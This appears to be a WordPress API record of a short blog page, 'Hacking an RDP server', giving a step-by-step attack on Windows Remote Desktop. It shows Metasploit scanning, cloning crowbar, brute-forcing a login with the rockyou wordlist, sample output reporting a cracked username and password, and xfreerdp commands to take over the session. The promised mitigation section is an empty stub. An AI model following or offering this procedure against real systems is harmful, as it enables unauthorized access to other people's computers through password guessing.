{"id":23059,"date":"2021-02-11T16:14:59","date_gmt":"2021-02-11T15:14:59","guid":{"rendered":"https:\/\/www.linuxboxen.dk\/?page_id=23059"},"modified":"2021-02-11T16:14:59","modified_gmt":"2021-02-11T15:14:59","slug":"hacking-paa-rdp-server","status":"publish","type":"page","link":"https:\/\/www.linuxboxen.dk\/?page_id=23059","title":{"rendered":"Hacking an RDP server."},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-23049 alignnone\" src=\"https:\/\/www.linuxboxen.dk\/wp-content\/uploads\/2021\/02\/metasexploit.png\" alt=\"\" width=\"490\" height=\"335\" \/><\/p>\n<p>Hacking RDP has become very easy.<\/p>\n<p>You need a Kali machine and a few tools.<\/p>\n<p>&nbsp;<\/p>\n<p>msf6 &gt; show options<\/p>\n<p>msf6 &gt; Set RHOST 192.168.0.23<\/p>\n<p>RHOST =&gt; 192.168.0.23<\/p>\n<p>exploit<\/p>\n<p>You can now see the list of which IPs are open for RDP.<\/p>\n<p>exit<\/p>\n<p>You also need crowbar from GitHub.<\/p>\n<p>cd git<\/p>\n<p>git clone https:\/\/github.com\/galkan\/crowbar<\/p>\n<p>cd crowbar<\/p>\n<p>.\/crowbar.py -h<\/p>\n<p>As I show here, we use 192.168.0.23 as the attack IP. The protocol is rdp (remote desktop). The username is brugernavn, and the last parameter is the password file to use. You will now get a list of which machines can be accessed, and you can access them with xfreerdp, for example, if you are on a Linux machine.<\/p>\n<pre>$ .\/crowbar.py --server 192.168.0.23\/32\u00a0 -b rdp -u brugernavn -C \/usr\/share\/wordlists\/rockyou.txt\n2021-02-10 23:34:50 START\n2021-02-10 23:34:50 Crowbar v0.4.3-dev\n2021-02-10 23:34:52 Trying 192.168.0.23:3389\n2021-02-10 23:34:54 RDP-SUCCESS : 192.168.0.23:3389 - brugernavn:mitkodeord<\/pre>\n<p>If you are missing the password file, you can install it as shown here.<\/p>\n<pre>$ sudo apt-get install wordlists<\/pre>\n<p>&nbsp;<\/p>\n<p>To open a remote desktop session to the machine, you can use xfreerdp. 
It is also easy to install with apt install.<\/p>\n<pre>$ sudo apt install xfreerdp<\/pre>\n<p>To start the remote desktop session, use the parameters you got from the scan.<\/p>\n<pre>$ sudo xfreerdp \/u:brugernavn \/p:mitkodeord \/v:192.168.0.23<\/pre>\n<p>If it is not installed, you can easily install it with apt as shown here.<\/p>\n<pre>$ sudo apt install freerdp2-x11\n\n$ sudo xfreerdp \/u:brugernavn \/p:mitkodeord \/v:192.168.0.23<\/pre>\n<p>You now have full remote desktop access to the machine.<\/p>\n<p>&nbsp;<\/p>\n<p>To stop this kind of attack, you can do the following in Windows.<\/p>\n<p>Start the Local Security Policy program<\/p>\n<pre class=\"notranslate\"><\/pre>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hacking RDP has become very easy. You need a Kali machine and a few tools. &nbsp; msf6 &gt; show options msf6 &gt; Set RHOST 192.168.0.23 RHOST =&gt; 192.168.0.23 exploit You can now see the list of which IPs are open for RDP. exit You also need crowbar from GitHub. cd git git clone https:\/\/github.com\/galkan\/crowbar cd [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"class_list":["post-23059","page","type-page","status-publish","hentry"],"a3_pvc":{"activated":true,"total_views":37,"today_views":0},"_links":{"self":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/23059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23059"}],"version-history":[{"count":0,"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=\/wp\/v2\/pages\/23059\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.linuxboxen.dk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}